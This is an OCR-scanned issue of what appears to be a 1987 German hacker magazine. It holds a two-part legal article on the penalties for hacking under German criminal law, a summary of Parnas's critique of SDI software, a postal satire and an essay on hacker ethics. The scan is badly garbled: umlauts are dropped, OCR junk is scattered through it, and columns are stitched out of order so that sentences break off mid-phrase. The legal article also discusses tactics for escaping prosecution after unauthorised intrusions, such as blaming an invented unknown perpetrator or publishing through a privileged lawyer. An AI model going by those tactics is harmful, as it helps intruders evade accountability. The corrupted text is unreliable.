ertrglich. G e m e i n t sind die aktuellen " T a r i f e " , die ein Hack e r zu " b e z a h l e n " hat, wenn er sich erwischen lt. D e r N A S A - H a c k , der wieder viele unbed a r f t e N a c h a h m e r motivieren drfte, sowie die die j n g s t e n Hausdurchsuchungen beim C C C Steffen u n d W a u - wegen angeblicher Haeks bei C E R N (Schweiz) u n d Philips (Frankreich) sind ein g u t e r A n l a , d i e T a r i f s t r u k t u r durchschaubar zu machen. M i t W i r k u n g vom 1.8.1986 sind die in der Presse sogenannten Anti-Hacker-Gesetze in Kraft getreten. Korrekt geht es u m das zweite Gesetz zur Bek m p f u n g von Wirtschaftskriminalitt (2. W i K G ) . Nachfolgend wollen wir einmal betrachten, was diese Gesetze dem Hacker so zu bieten haben. Fr den preiswerten Einstieg (bis zu 2 Jahren Freiheitsstrafe oder Geldstrafe) wre zunchst der neue 202a S t G B zu nennen. Besonderer Vorteil: Jederzeit problemlos zu buchen! In 202a S t G B wird das " A u s s p h e n v o n Daten" unter Strafe gestellt. Strafbar macht sich, " w e r unbefugt Daten, die nicht fr ihn bestimmt und gegen unberechtigten Zugang besonders gesichert sind, sich oder einem anderen verschafft". Wer also den Pawortschutz eines Systems knackt und sich dann in dem System umsieht, das heit Daten liest oder downloaded, hat den 202a StGB fest gebucht. W e r erwischt wird, knnte sich aller><tieiiSrf|kui>cr Damit sind wir bei dem Problem: W a n n hat man sich (oder einem anderen) Daten "verschafft"? Z u m einen, wenn man selbst von den Daten Kenntnis erlangt (also wenn man sie liest) bzw. einem anderen die Kenntnisnahme ermglicht. Auch ohne Kenntnisnahme sind die Daten "verschafft", wenn man sie in Besitz nimmt. Das wre der Fall, wenn die fremden Daten auf einem Datentrger mitgespeichert oder a u f Papier ausgedruckt werden. Gerichtsentscheidungen sind, soweit m i r bekannt, hierzu noch nicht ergangen. D i e soeben ausgefhrte Argumentation halte ich fr richtig, und sie ist im juristischen Schriftum inzwischen vorherrschend. Von daher ist davon auszugehen, da eine Strafbarkeit wegen Aussphens von Daten schon dann in Betracht kommt, wenn die Daten nur durch eine Pawortabfrage gesichert sind. Schutzmanahme. Auerdem hat der Besitzer der Daten durch einen Pawortschutz hinreichend deutlich gemacht, da diese Daten nur befugten Personen zur Verfgung stehen sollen, und da er sich um die Abwehr von Unbefugten emsthaft bemht. Damit sind die Voraussetzungen erfllt, die der Gesetzgeber erfllt wissen wollte, um einen strafrechtlichen Schutz von Daten zu gewhren.

dings darauf berufen, er habe nur das Pawort geknackt, sich dann aber sofort wieder ausgeloggt, ohne sich im System weiter umgesehen zu haben. Das ist zwar kaum wahrscheinlich, das Gegenteil drfte aber nur schwer zu beweisen sein. Fraglich ist, o b diese Argumentation geeignet ist, einer Strafe wegen Aussphens von Daten zu entgehen. Immerhin ist das erhackte Pawort auch ein Datum, was man sich verschafft hat. U n d zwar eins, das besonders geschtzt ist: Quasi durch das Pawort selbst! Warten wir ab, wie die Gerichte entscheiden werden. Festzuhalten bleibt, da wer in eine durch Pawortabfrage gesicherte Mailbox, Datenbank oder ein sonstiges Rechnersystem (vorstzlich) unbefugteindringt, mit einer Strafe wegen Aussphens von Daten zu rechnen hat. Als kleines Bonbon fr gefrustete Hacker: Der Versuch ist nicht unter Strafe gestellt. Auerdem wird die Straftat nur auf Antrag des Verletzten verfolgt. D.h., dadie S taatsan waltschaft von sich aus die Tat nicht verfolgen kann. Sowei t der Billigtarif fr Einstelger. Aber das Gesetz hat fr extravagante Kunden auch noch teurere Angebote auf Lager. Z . B . fr solche, die Daten zerstren oder verndern. Dazu zhlen auch der Einsatz von Viren oder (die wohl auch beim NASA-Hack eingestzten) Trojanischen Pferde. Damit sind wir beim Thema Datenvernderung ( 303a StGB) und Computersabotage 303b StGB). Der Tarif fr die schlichte Datenvernderung ist noch relativ moderat: Es wird Freiheitsstrafe bis zu zwei Jahren oder Geldstrafe geboten. Computersabotage kommt schon teurer: Freiheitsstrafe bis zu 5 Jahren oder Geldstrafe. Manche Hackerwerden sich jetzt vielleicht in die Brust werfen, bekannte Phrasen ber "Hacker-Ethos" ablassen und kategorisch feststellen: "Hacker sabotieren nicht." - Doch! So zum Beispiel die NASA-Hacker! (Oder waren das gar keine "Hacker" ???) Zunchst zur Datenvernderung. Bestraft wird, wer Daten "lscht, unterdrckt, unbrauchbar macht oder verndert". D a ist das Gesetz einmal so erfreulich deutlich, da es auch dem Laien kaum noch kommentiert zu werden braucht. Praktisch jede Manipulation von gespeicherten Daten wird von der Norm erfat. Dazu gehrt natrlich auch das Ergnzen von Daten, zum Beispiel das Einfgen eines neuen Paworts in die Passwort-Datei. Fast berflssig zu erwhnen, da Programme selbstverSotcngrfjlcubet

stndlich auch Daten sind. Werden

Programme

durch Viren oder Trojanische Pferde verndert, so liegt eine strafbare Datenvernderung vor. Dies kommt ebenso in Betracht, wenn Daten an einen anderen Empfnger umgeleitet oder sonst abgefangen werden. Im Gegensatz zum Aussphen von Daten ist hier auch schon der Versuch strafbar. Stmperei schtzt also vor Strafe nicht! Verfolgt wird die Datenvernderung - wie auch die im Anschlu vorgestellte Computersabotage- nurauf Antrag. Bei besonderem ffentlichen Interesse kann die Staatsanwaltschaft aber auch von Amtswegen, also ohne Strafantrag des Verletzten, einschreiten. Die Computersabotage ( 303B S t G B ) soll uns hier nur in ihrer ersten Fallgestalt ( 303b I Nr.l StGB; Nr.2 bezieht sich nur auf Beschdigung von Hardware) interessieren. Dort baut sie auf der Datenvernderung auf. Computersabolage ist demnach eine Daten V e r n d e r u n g (wie oben dargestellt), wenn dadurch "eine Datenverarbeitung, die fr einen fremden Betrieb, ein fremdes Unternehmen oder eine Behrde von wesentlicher Bedeutung ist", gestrt wird. " V o n wesentlicher Bedeutung" isl eine D V A , wenn von ihrem strungsfreien Ablauf die Funktionstchtigkeit des Betriebes im Ganzen abhngt. Dies betrifft heute, rasch zunehmend, die meisten Betriebe, Unternehmen oder Behrden, die eine elektronische Datenverarbeitung einsetzen. Keineswegs falsch drfe die Annahme sein, da die EDV-Anlagen der N A S A und der ihr angeschlossenen Forschungsinstitute fr ihre Betreiber eine wesentliche Bedeutung haben. In diesen Anlagen der N A S A (und anderer Institute) sind bei dem NASA-Hack Daten durch Einsatz von Trojanischen Pferden verndert worden. Damit haben die NASAHacker ein schnes Beispiel fr eine Computersabotage geliefert. Auch bei der Computersabotage ist schon der Versuch strafbar. Zur Erforderlichkeit eines Strafantrags siehe oben. Im folgenden zweiten Teil dieses Artikels werden die etwas teureren Normen vorgestellt und berlegungen angestellt, ob und wie unter bestimmten Umstnden sttaffreies Hacken mglich sein knnte.

Stoepsel CLINCH/D-RED/STEPSEL/30.09.87/23:20/8494 Z.

Die aktuellen Tarife fr's Hacken


2. Teil

\U

mit dem Vermgensvorteil, den der Tter anstrebt und auch erwirbt. Damit liegen die Voraussetzungen des Computerbetrugs vor. Entsprechend drften, abhngig vom Einzelfall, die Voraussetzungen eines Computerbetruges auch dann vorliegen, wenn mit einem fremden oder falschen Pawort ein anderes Netzwerk fr eine preiswerte Datenreise geffnet wird. Von daher knnte auch unterdiesem Gesichtspunkt beim N AS A-Hack ein Computerbetrug begangen worden sein. Allgemein ist zu den Voraussetzungen des Computerbetrugs noch anzumerken, da strafbar nur die vorstzliche Handlung ist. W i e schon angedeutet, mu zustzlich, wie bei 263 auch, der Tler die Absicht haben, sich durch seine Handlung einen rechtswidrigen Vermgensvorteil zu verschaffen. Auch beim Computerbetrug ist schon der Versuch
strafbar.

I ackern, denen selbst bei Androhung von bis zu fnf Jahren Freiheitsstrafe noch der rechte Nervenkitzel fehlt, kann geholfen werden. So sind im Rahmen der "Anti-Hacker-Gesetze" Normen eingefhrt worden, nach denen in besonderen Fllen bis zu 10 und sogar bis zu 15 Jahren Freiheitsstrafe verhngt werden kann. Mehr hat unser Stn<frecht selbst einem Totschlger nicht zu bieten.

Die Normen, bei denen die angesprochenen hohen Strafen (in besonders schweren Fllen) verhngt werden knnen, sind der Computerbetrug ( 263a StGB) und die Flschung bewciserhcblichcr Daten ( 269 StGB). Hier sind wir wieder an einem Punkt, wo "ehrliche" und "ehrenhafte" Hacker aufbegehren werden: "Betrgen tun wir wirklich nicht!" - Nein, wirklich nicht? Da wre ich mir gar nicht so sicher. Der Computerbetrug nach 263a StGB baut auf dem "normalen" Betrug auf. Er soll Strafbarkeitslcken schlieen, wenn statt eines Menschen ein Computer "betrogen" wird. Daher sei hier zunchst der schlichte Betrug nach 263 StGB erklrt. Der Betrug nach 263 StGB setzt in Kurzform folgendes voraus: Der Tter nimmt einem anderen gegenber eine Tuschungshandlung vor. Diese bewirkt bei dem Getuschten einen Irrtum. Aufgrund dieses Irrtums nimmt der Getuschte eine vermgensschdigcnde Verfgung ber eigenes oder fremdes Vermgen vor. Beim Computerbetrug nach 263a StGB ist die Vermgensschdigung eines Dritten nun auch strafbar, wenn nicht eine Person, sondern ein Computer durch Eingriffe ins Programm oder durch Manipulation von Daten etc. "getuscht" wird. Ein einfaches Beispiel fr einen Computerbetrug: Bankangestellter A manipuliert die i m Computer seiner Bank gespeicherten Daten so, da sein Minuskonto wieder einen schnen Guthabenbetrag ausweist. Flle dieser Art mgen dem Gesetzgeber in erster Linie vorgeschwebt sein, als erden 263a einfhrte. Aber die Anwendbarkeit des Computerbetrugs geht erheblich weiter. So ist der Gebrauch von "Leih-NUI's" unproblematisch als Computerbetrug zu bewerten. Denn das Vermgen des NUI-Inhabers wird dadurch geschdigt, da durch unbefugte Benutzung von Daten ( N U I Teil A und B) der A b l a u f eines Datenverabeitungsvorgangangs (beim P D durch Leistungsgewhrung an den Unberechtigten) beeinflut wird. Dieser Vermgensschaden ist "stoffgleich"

Abschlieend kommen wir zur Flschung beweiserheblicher Daten ( 269 StGB). Bestraft wird nach dieser Norm, wer zur Tuschung im Rechtsverkehr beweiserhebliche Daten so speichert oder verndert, da bei ihrer Wahrnehmung eine unechte oder verflschte Urkunde entstehen wrde. Ebenso bestraft wird, wer derart gespeicherte oder vernderte Daten gebraucht. Aufgrund des doch recht betrchtlichen Strafrahmens - es knnen bis zu fnf, und wie bereits dargelegt, in besonders schweren Fllen bis zu 15 Jahren Freiheitsstrafe verhngt werden - soll hier etwas nher erlutert werden, wann eine Strafbarkeit nach 269 StGB vorliegen knnte. 269 StGB knpft an den 267 StGB (Urkundenflschung) an. Im Unterschied zu Urkunden sind Daten nicht unmittelbar wahrnehmbar. Die Daten sind im Hauptspeicher des Computers oder auf Datentrger gespeichert. Dort sind sie fr den Menschen nicht ohne Hilfsmittel sichtbar. Erst wenn die Daten auf einem Bildschirm angezeigt oder von einem Drucker ausgedruckt werden, sind sie wahrnehmbar. Frhestens dann knnten die Daten eine Urkunde sein. Der Gesetzgeber wollte die Strafbarkeit aber vorverlegen auf den Zeitpunkt der Manipulation der Daten. Das hat den Vorteil, da die Strafbarkeit nicht zufllig davon abhngt, ob bzw. wann die Daten sichtbar gemacht werden. Deswegen ist in 269 StGB unter Strafe gestellt worden, beweiserhebliche Daten so zu manipulieren, da diese Daten - wren sie unmittelbar wahrnehmbar eine unechte oder verflschte Urkunde darstellen wrden.

Btx 655322

SnicnBrfflciiber

Entscheidend ist, was unter einer unechten oder verflschten Urkunde zu verstehen ist. Eine unechte Urkunde wrden die Daten bei ihrer Wahrnehmbarkeit sein, wenn ber den Aussteller der Urkunde getuscht wird. Also wenn die Daten nicht von demjenigen stammen, von dem sie zu stammen scheinen. Verflscht wird eine Urkunde, wenn eine zunchst echte Urkunde so verndert wird, da ihr Inhalt dem Erklrenden (Aussteller) nicht mehr zuzurechnen ist. Ebenfalls bestraft wird das Gebrauchen der in oben beschriebener Weise manipulierten Daten. Ein Gebrauchen liegt z.B. vor, wenn dem zu Tuschenden die Daten auf einem Datentrger berlassen oder am Bildschirm sichtbar gemacht werden. Dazu ein Beispiel: Banklehrling L "spielt" an dem Rechner seines Kreditinstituts herum. Dabei manipuliert erdie im Rechner gespeicherten Daten so, da sein Girokonto endlich mal wieder schwarze Zahlen zeigt. Auerdem richtet er sich ein neues Sparbuch mit einem Guthaben von 100.000,- D M ein. - Im ersten Fall wrde bei Wahrnehmbarkeit der Daten eine verflschte, im zweiten eine unechte Urkunde vorliegen. G u t , so etwas tut ein Hacker nicht. Aber eine NUI "leiht" er sich doch schon einmal aus. Dabei ist die Rechtslage nicht so zweifelsfrei wie bei dem obigen Beispiel, abereine Flschung beweiserheblicher Daten k o m m t auch dort in Betracht. Denn durch Eingabe der N U I Teil A und B scheint doch der NUIInhaberzu erklren,da erdie Verbindung zum P D hergestellt hat und fr die anfallenden Gebhren (notgedrungen) a u f k o m m e n will. Wren diese beweiserheblichen Daten unmittelbar wahrnehmbar, wrden sie w o h l als Urkunde einzustufen sein. In der Literatur ist dieses Beispiel noch nicht errtert worden, aber m i r scheint, da man hier das Vorliegen eines Delikts der Flschung beweiserheblicher Daten bejahen mte. D a m i t sind die wichtigsten Tariffragen fr Hacker gekln. Klar drfte jetzt sein, da es kaum mglich ist, zu hacken, ohne sich strafbar zu machen. Damit stellt sich fr Einzelpersonen und Vereine, die die Unsicherheit der Netze erforschen und aufdecken wollen (und n u r u m die soll es hier gehen - Hackern die aus purer Neugier, Geltungssucht oder sogar Gewinnsucht handeln, kann und will ich nicht helfen) die Frage, o b und wie sie noch hacken knnen, ohne ein groes Strafrisiko auf sich zu nehmen. D e n n eins steht fest: Der legendre HASPA-Coup D a derjenige, der den Hack publiziert, angeblich nicht Tter ist, ist er grundstzlich als Zeuge zur Aussage verpflichtet. W i r d die Aussage verweigert, kann ein Ordnungsgeld verhngt und Erzwingungshaft bis zu 180 Tagen angeordnet werden. Also auch keine rechte Perspektive. Snlciiertjlciibcr D a , wie in den ersten Teilen dargestellt, praktisch keine Mglichkeit besteht, einen erfolgreichen Hack durchzufhren, ohne mit Strafgesetzen in Konflikt zu geraten, gibt es nur noch eine Mglichkeit: Blo S'ntciiSrijIciibcr Stoepsel CLINCH/DS-RED/STOEPSEL/30.09.87/23:27/12330 Es scheint sich nur eine halbwegs erfolgsversprechende Lsung anzubieten, wie man dennoch einer Bestrafung entgehen knnte. Dies wre ein Vorgehen, hnlich wie der C C C beim NASA-Hack praktiziert hat. M a n bekennt nicht, die Tat selbst verbt zu haben. Stattdessen schiebt man den groen Unbekannten vor, der die Tat begangen habe, die man selbst nun fr ihn publik mache. Solange sich nicht beweisen lt, da der Unbekannte eine Erfindung ist und der wahre Tter der den Hack Publizierende ist, kann letzterer auch nicht bestraft werden. Da j a Zweck der ganzen u n g sein soll, sich nach einem erfolgreichen Hack an die ffentlichkeit zu wenden, um die Sicherheitslcken publik zu machen, m u man zwangslufig den K o p f aus der Deckung nehmen und damit auch den Strafverfolgungsbehrden eine Angriffsflche bieten. Erheblich sicherer ist es da, jemand einzuschalten, der aus beruflichen Grnden ein Zeugnisverweigerungsrecht hat: Einen Rechtsanwalt. Dieser wird damit betraut, im Namen seiner nicht zu benennende.; Mandanten der ffentlichkeit die entsprechenden Erklrungen und Belege fr den Hack abzugeben. Aber auch diese Methode ist nicht ohne Nachteile. Auch wenn der Anwalt weder Aussagen braucht noch machen darf, so lt sich doch mglicherweise ber den Anwalt auf die in Betracht kommenden Tter schlieen. Wenn das gelingt, stellt sich wieder die Frage: Lt sich bei denen etwas finden, gibt es undichte Zeugen? berzeugen knnen alle diese Varianten nicht. Daher sollte untersucht werden, wie man Aktionen starten kann, bei denen man sich erst gar nicht strafbar macht. Wenden wiruns zunchst der ersten Mglichkeit zu. Sie hat den Vorteil, da man sich kaum Einschrnkungen beim Hacken auferlegen mte. Der groe Nachteil ist der gewaltige Risikofaktor dabei. des C C C liee sich bei der heutigen Gesetzeslage nicht wiederholen, ohne da die Akteure mit Freiheits- und/oder Geldstrafen rechnen mten! Theoretisch bieten sich zwei Mglichkeiten an. Die erste Mglichkeit wre, sich u m die Gesetze nicht viel zu scheren, aber dafr zu sorgen, da einem nichts nachgewiesen werden kann. Die zweite Mglichkeit wre so vorzugehen, da man sich trotz raffinierter Hacks nicht strafbar macht. Hiergegen hilft nur, sich darauf zu berufen, da man keine sachdienlichen Angaben machen knne. Dies ist bei einem detalierten Bericht ber den Hack kaum glaubwrdig. Daher wre die Gefahr einer Erzwingungshaft auf diese Weise nur schwerlich abzuwenden. Ein anderer Ausweg wre noch, sich auf das Zeugnisverweigerungsrecht zu berufen. Ein solches steht einem zu, wenn man sich andernfalls selbst oder einen nahen Verwandten belasten mte. Damit ist dann der groe Unbekannte aber im Prinzip wieder gestorben. Die Staatsanwaltschaft wird schnell nachweisen knnen, da das Zeugnisverweigerungsrecht nicht besteht, oder aber aen lterkreis sehr eng eingrenzen knnen. Damit stellt sich die Frage: Gibt es Beweise die sich finden lieen, Zeugen die bei bohrender Befragung "singen" knnten? W e n n ja, dann ist das Spiel verloren! solche Hacks zu machen, bei denen man zuvor eine Einwilligung des Opfers einholt. Bei einer Wiederholung des HASPA-Coups etwa mte man vorher zu H A S P A gehen und sagen, was man vor hat, warum man es vorhat, und dafr um Erlaubnis bitten. Wenn man diese erhlt und sich ausschlielich im Rahmen dieser Einwilligung bewegt, ist jedes Strafrisiko ausgeschlossen. Wenn man sein Vorhaben vorher genau ankndigen mu, mindert das natrlich die Erfolgsaussichten rapide, da der Betroffene sich auf den bevorstehenden Angriff einstellen und vorbeiten kann. Anderseits ist die Wirkung im Erfolgsfalle umso grer. Schlielich ist der Hack dann unter erschwerten Umstnden geglckt. Fraglich ist natrlich, ob sich die erforderlichen Einwilligungen bekommen lieen. Das hngt ganz von dem jeweiligen Betroffenen ab, und wie man ihm das Projekt verkauft. Einerseits wird das potentielle Opfer eines Hacks kein Interesse daran haben, da ffentlich vorgefhrt wird, wie ungengend seine Sicherheitsmanahmen sind. Andererseits wrde er sich gewi gerne damit brsten knnen, da sein System nicht geknackt werden konnte. Auerdem erhielte er praktisch eine kostenlose Sicherheitsberprfung, fr die sich manche Unternehmen in den U S A teure "Haus-undHof-Hacker" halten. So gesehen ist es vielleicht gar nicht so unwahrscheinlich, legale Hacks machen zu knnen. Ich denke, da diese Mglichkeit nher untersucht werden sollte. Unterm Strich ist sie wohl fr alle Beteiligten die beste aller mglichen Lsungen.

JE SCHARFER

DESTO ANREGENDER.

10

11

Bit-Dschungel Software

in

der

SDI-

zu 1) Fr Softwareprodukte wird hufig eine Garantieleistung ausgeschlossen Das liegt daran, da Industrieprodukte mit analog arbeitenden Maschinen erzeugt werden und die Funktionsweise dieser Maschine durch stetige Funktionen beschrieben werden. Die entsprechenden mathematischen Modelle sind entwickelt und seit langem beherrscht. Demgegenber sind Softwarekomponenten Systeme mit einer sehr groen Anzahl diskreter Zustnde. Die zahlreichen Einzelzustnde und Wechselwirkungen der Komponenten untereinander knnen derzeit durch kein mathematisches Modell annhernd vollstndig beschrieben werden. Eventuell kann die mathematische Logik fr die Softwareentwicklung die Rolle der Analysis in der traditionellen Technik bernehmen. Derzeitreichen diese Methoden jedoch bei Weitem nicht aus, selbst kleine Softwaresysteme zu behandeln.

Der Leiter der University of V i c t o r i a , V i c t o r i a , Canada; Navel Research L a b o r a t o r y , W a s h i n g ton, D . C . ) gegenber der S D I - O r g a n i s t i o n hat seinen Verzicht auf die weitere M i t a r b e i t i m Ausschu

fr computergesttzte K r i e g s f h r u n g darwiedergegeben. Dabei sind

gelegt. I m Folgenden werden einige Auszge seiner Begrndung wrtlich bersetzte Z i t a t e in A n f h r u n g ( ' ) eingeschlossen.

zu 3) Die konventionelle Methode der Softwareentwicklung ist, 'wie ein Computer zu denken'. Die Komplexitt eines Problems und die Abhngigkeit von Bedingungen, die erst zum Ablaufzeitpunkt ermittelt werden, fhrt stets dazu, da Softwarefehler bei Tests oder sogar erst whrend des Einsatzes festgestellt werden. In der Industrie gibt es eigenstndige Arbeitsgruppen, die unabhngig vom Programmierer Test durchfhren (Qualittssicherung). Diese Mglichkeit steht aber fr die SDI-Software nicht zur Verfgung (s. 2)). zu 4) Die wichtigsten Methoden bei der Erstellung groer Softwaresysteme sind: 1) strukturierte Programmierung und der Gebrauch formaler Programmiersprachen 2) formale Spezifikation abstrakter Schnittstellen 3) der Einsatz kooperierender sequentieller Prozesse. Anhand eines Projektes der US-Marine zeigt Prof. Parnas auf, warum die Softwareerstellung trotzdem nicht problemlos erfolgen kann. Effizientere Programmiersprachen und Programmentwicklungswerkzeuge knnen zwar diese Probleme mildern, aber nicht beseitigen. 'Methoden des Software Engineerings verhindern keine Fehler. ... die erfolgreiche Anwendung dieser Methoden hngt ab von der Erfahrung, die mit der Erstellung und Pflege vergleichbarer Systeme gesammelt wurde. Es gibt keinen derartigen Erfahrungsschatz fr das SDIKriegsfhrungssystem. ... Ich gehe davon aus, da auch die Forschung der nchsten 20 Jahre keine Aenderung dieser Tatsache erbringen wird.'
] j ! i ; O b s e r v a t o r i u m an K o n t r o l l Z e n t r u m Die R a k e t e ist 800 K i l o m e t e r e n t f e r n t D e r A t o m m o t o r hat a u t o m a t i s c h gezndet

Einleitend weist Prof. Pamas darauf hin, da seine Schlufolgerung, da seine Arbeit des Ausschusses nutzlos sei, nicht politisch motiviert ist. In der Vergangenheit hat er sich nicht geweigert, an militrisch gefrderten Forschungsprojekten mitzuwirken. 'Meine Schlufolgerungen basieren auf mehr als 20-jhriger Forschung in der Softwareentwicklung, einschlielich einer mehr als 8-jhrigen Entwicklungsarbeit an Software fr Realzeitsysteme, die fr Militrflugzeugen eingesetzt werden.Sie beruht auf der Vertrautheit sowohl mit militrisch genutzter Software als auch mit der Forschung in der Computer-Wissenschaft.' Seine Begrndung ist in acht jeweils zwei bis drei Seiten langen Artikeln niedergelegt: 1) Warum arbeitet Software unzuverlssig ? 2) Warum das SDI-Softwaresystem nicht vertrauenswrdig sein wird. 3) Warumbei konventioneller Softwareentwicklung keine zuverlssigen Programme entstehen. 4) Die Grenzen der Methoden des Softwareengineerings. 5) Knstliche Intelligenz und SDI. 6) Kann automatisierte Programmierung das SDISoftware-Problem lsen ? 7) Kann Programmverifikation die SDI-Software vertrauenswrdig machen ?

zu 2) Wenn Software die fr S D I erforderlichen Eigenschaften besitzen soll, m u man sich felsenfest verlassen knnen, bevor m a n das gesamte Verteidigungskonzept darauf abstellt. A u s folgenden Grnden ist dieser hohe Grad der Zuverlssigkeit nicht erreichbar: 1) Ohne genaue Kenntnis der ballistischen Eigenschaften der Ziele, die mit Hilfe der SDI-Software identifiziert, verfolgt und letztlich vernichtet werden sollen, mssen schwerwiegende Fehlreaktionen die' Folge sein. Es liegen jedoch keine genauen Informationen ber alle Ziele vor. 2) 'Es wird unmglich sein, das System unter realistischen Bedingungen voreinemEinsatz zu testen.' 3) D a einige Sensoren und A b w e h r s y s t e m e ber e i g e n e r e c h n e r g e s t t z t e L e i t s y s t e m e v e r f u g e n , ents t e h t s o ein G e s a m t s y s t e m , d a s w e s e n t l i c h k o m p l i z i e r t e r als alle b i s h e r i g e n S y s t e m e ist.

Programmierung nichts ohne (algorithmische) Programmiersprachen, aber Fehlerfreiheit garantieren sie auch nicht. 'Auerdem ist eines der grundlegenden Probleme bei S D I , da uns die Information fehlt, vertrauenswrdige Spezifikationen aufzuschreiben.'

D a insbesondere auch eine so moderne Technologie wie die der knstlichen Intelligenz im Rahmen der SDI-Forschung eine groe Rolle spielen soll, warnt Prof. Pamas vor bertriebenen und unrealistischen Erwartungen ('Knstliche Intelligenz stellt keinen Zauber zur Lsung unserer Probleme dar. Insbesondere ist der Einsatz von Computersystemen, deren Problemlsungsstrategien denen menschlicher Experten nachempfunden ist, gefhrlich, da sich die Regeln, die man aus der Beobachtung der menschlichen Handlungsweise gewinnt, als inkonsistent, unvollstndig und ungenau herausstellen.

zu 7) Abgesehen davon, da bisher nur fr im Vergleich zur SDI-Software kleinen Programmen eine Verifikation erfolgreich durchgefhrt wurde, m u vor einer Verifikation zunchst eine vollstndige Programmspezifikation vorliegen (s. 2), 6)). Auerdem soll die SDI-Software auch dann noch funktionsfhig bleiben,selbst wenn Teile des Gesamtsystems zerstrt sind. Es gibt aber bisher, trotz 20-jhriger Forschung auf diesem Gebiet, 'keine Beweistechniken fr die Korrektheit eines Programms beim Auftreten nicht vorhersehbarer Bedrohung bleiben. (..) Der Prsident und die ffentlichkeit mssen dies wissen.'

12

8) Ist die SDI-Organisation ein effizienter W e g erfolgreiche Forschung zu ermglichen ?

CLINCH/POLITIK/HHNET/17.08.87/17:27/6617 Z.

( ^ ^ s S i e SfliciiSdjlcii&cr

( ^ f f ^ i c

Sntciiidflciiher

13

What to know about Data Travellers


Datenreisen und Hackerethik

Stop and Go

Hack'n'Crack
2.CSS Summa Convention in Stuttgart.

'Bitte haben Sie Verstndnis, wenn es zu V e r z gerungen in der Bearbeitung k o m m t , w i r haben a u f C o m p u t e r umgestellt.* Dieser Spruch kennzeichnet vielfach die Irrungen und Wirrungen, die sich bei der Einfhrung neuer Technologien ergeben. Besonders wirkungsvoll geht dabei wieder einmal die Post vor, die unlngst mehrere Laserdrucker erworben hat und versucht, mit den professionellen Geldinstituten Schritt zu halten. Bei denen gibt es j a schon seit Jahren die scheckgrossen rot-gelben Formulare, mitdenen man fast alle Geldgeschfte erledigen kann, ohne an seine Hausbank gebunden zu sein. Beleggebundener Zahlungs- verkehr nennt sich diese Buchungstechnik und ist ohne entsprechende Rechnerkapazitt nicht zu bewltigen. Bei der Post versucht man es trotzdem. Und erzeugt so lange Schlangen vor den Schaltern und lange Gesichter bei den Schalterbeamten. Getreu dem alten Bundeswehrmotto ' W a r u m Maschinen einsetzen, wenn man das auch mit Arbeitskraft hinkriegt' wird aus dem B Z V bei Postens ein listengebundener Zahlungsverkehr, dessen hchster Automatisierungsgrad in der Verwendung eines Stempels besteht. Und warum dieses? Nicht etwa, weil die neuen Formulare so hbsch bunt sind und den Rechenzentren die Gelegenheit geben, die sndleueren Laserdrucker endlich zu benutzen (das Posthorn auf den Telefonrechnungen ist brigens vom Design her vllig daneben), sondern weil in naher Zukunft E P O S kommt, der elektronische Postschalter, der ab 1988 den ohnehin knappen Platz im Standardschalter noch weiter verringert. Zwar gibt es noch keine entsprechend ausgebildeten Techniker, vom Bedienungspersonal ganz zu schweigen, aber immerhin, E P O S kommt. Und deshalb gibt es jetzt schon die neuen Formulare, die noch nicht mal die Selbstdurchschreibequalitt haben, die man bei der B ank seit Jahren kennt. berdies ist es erheblich Zeit - und Energiesparender, statt der neuen Belege einen der guten alten blauen Zahlscheine zu benutzen. Oder man greift gleich zur BTX-Kontenfuhrung Und erspart sich und dem Schalterpostler eine Menge Stress...

Anllich des Bit B a n g i m September 1987 stellt sich von neuem die Frage nach der E t h i k der Hackerkultur. D i e meisten Statments des C C C in Bezug auf die Lebensweise der Hacker gehen in die Richtung: Hacken ist ein (Lebens-)Einsteliung, die auf Neugier beruht. Diese uert sich im Hinterfragen auch der scheinbar feststehendsten Dinge dieser Welt. Die Antworten, die die Hacker finden, entsprechen oft nicht den angeblich so feststehenden Tatsachen. Es ist der gleiche Wissensdrang, der das Wissen der Menschheit seit Jahrhunderten vorantreibt. Trotzdem bleibt es eine Herangehensweise, die den meisten Menschen fremd ist. Hacken bedeutet stndige Selbstbeobachtung und -Kontrolle, gleichzeitig eine Offenheit frdieabwegigsten Ideen. Wichtigist nur eines: da die Idee weiter auf dem eingeschlagenen Pfad fhrt. Weiterhin hat der Hacker Erfahrungen gemacht, die i h m sein Wissen, sprich seine Macht, vor Augen fhrt und gleichzeitig die Ohnmacht der meisten anderen Menschen deutlich macht. Kaum einer ist dazu mehr berufen, die Fhigkeiten und Schwchen eines Computers zu beurteilen als ein Hacker, der sich intensiv mit dem Rechner auseinandergestzt hat. Sie haben Respekt vor den Leuten, die noch ein Stckchen weiter sind als sie: die Systemhersteller. Sie verabscheuen Leute, die Daten oder Rechner zerstren, denn sie wissen nicht nur um deren Informationsgehalt sondern auch um die M h e , diesen zu erstellen. Hacker warnen nicht ohne Grund seit Jahren vor den Schwchen und Grenzen der Systeme. Sie wissen, w o v o n sie reden. Meist kennen sie nicht nurdas, was der normale Benutzer von den Systemen sieht. Hacker sind keine A n h n g e r blinden Glaubens an den Groen Bruder Computer. In einer Gemeinschaft sollte jeder einen Teil der Arbeit machen. Hacker tragen Ihren Teil zur Gemeinschaft bei, indem sie versuchen ihre ErfahrunZum Schlu ein Hinwels auf zwei Bcher: Steven Levy, "Hackers - Heroes Of The Computer Revolution", Anchor Press/Doubleday, Garden City, New Vork, 1984 Bill Landreth, "Out Of The Inner Clrcle - A Hackers Guide To Camputer Security", Microsott Press, Washington, 1984 (auf Deutsch bei Goldmann) S(ttciiStf;lcul>cr Asterlx gen weiterzugeben. Kritik ist neben Kreativitt der strkste Motor auf dem W e g zu mehr Wissen. Ein Vorwurf lautet, Hacker wrden gegen Gesetze verstoen. Erstens einmal stellt sich da die Frage: gegen Gesetze welchen Landes verstoen sie denn nun, wenn sie aus Land A via Land B , C und D nach Land E Datenreisen. Nach bundesrepublikanischer Rechtsauffassung knnen sie gem bundesdeutschem Recht verurteilt werden, auch wenn Land E Papua Neu-Ginuea heit. Eine Meinung, mit der die Bundesrepublik ziemlich einsam auf weiter Flur steht. Zudem hielt der Gesetzgeber in seinen Erluterungen zum 2. Wirtschaftskriminalittsgesetz fest, da Hacken als solches nicht strafbar gemacht werden soll. Es fragt sich auerdem, o b man Personen bestrafen sollte, die der Gesellschaft mit ihrer angeblich so verwerflichen Tat einen Dienst erwiesen haben. Mageblich beeinflut wird diese Frage natrlich dadurch, da in vielen Fllen Fehler der Computerhersteller Ursache fr Hacks sind. Soll man nun diejenigen bestrafen, die diese Fehler aufsprten, oder diejenigen, die sie verursachten? Hacker sind oft schwer zu begreifende Individuen, doch sollte das alle anderen dieser Weltengesellschaft nicht dazu verleiten, sie zu 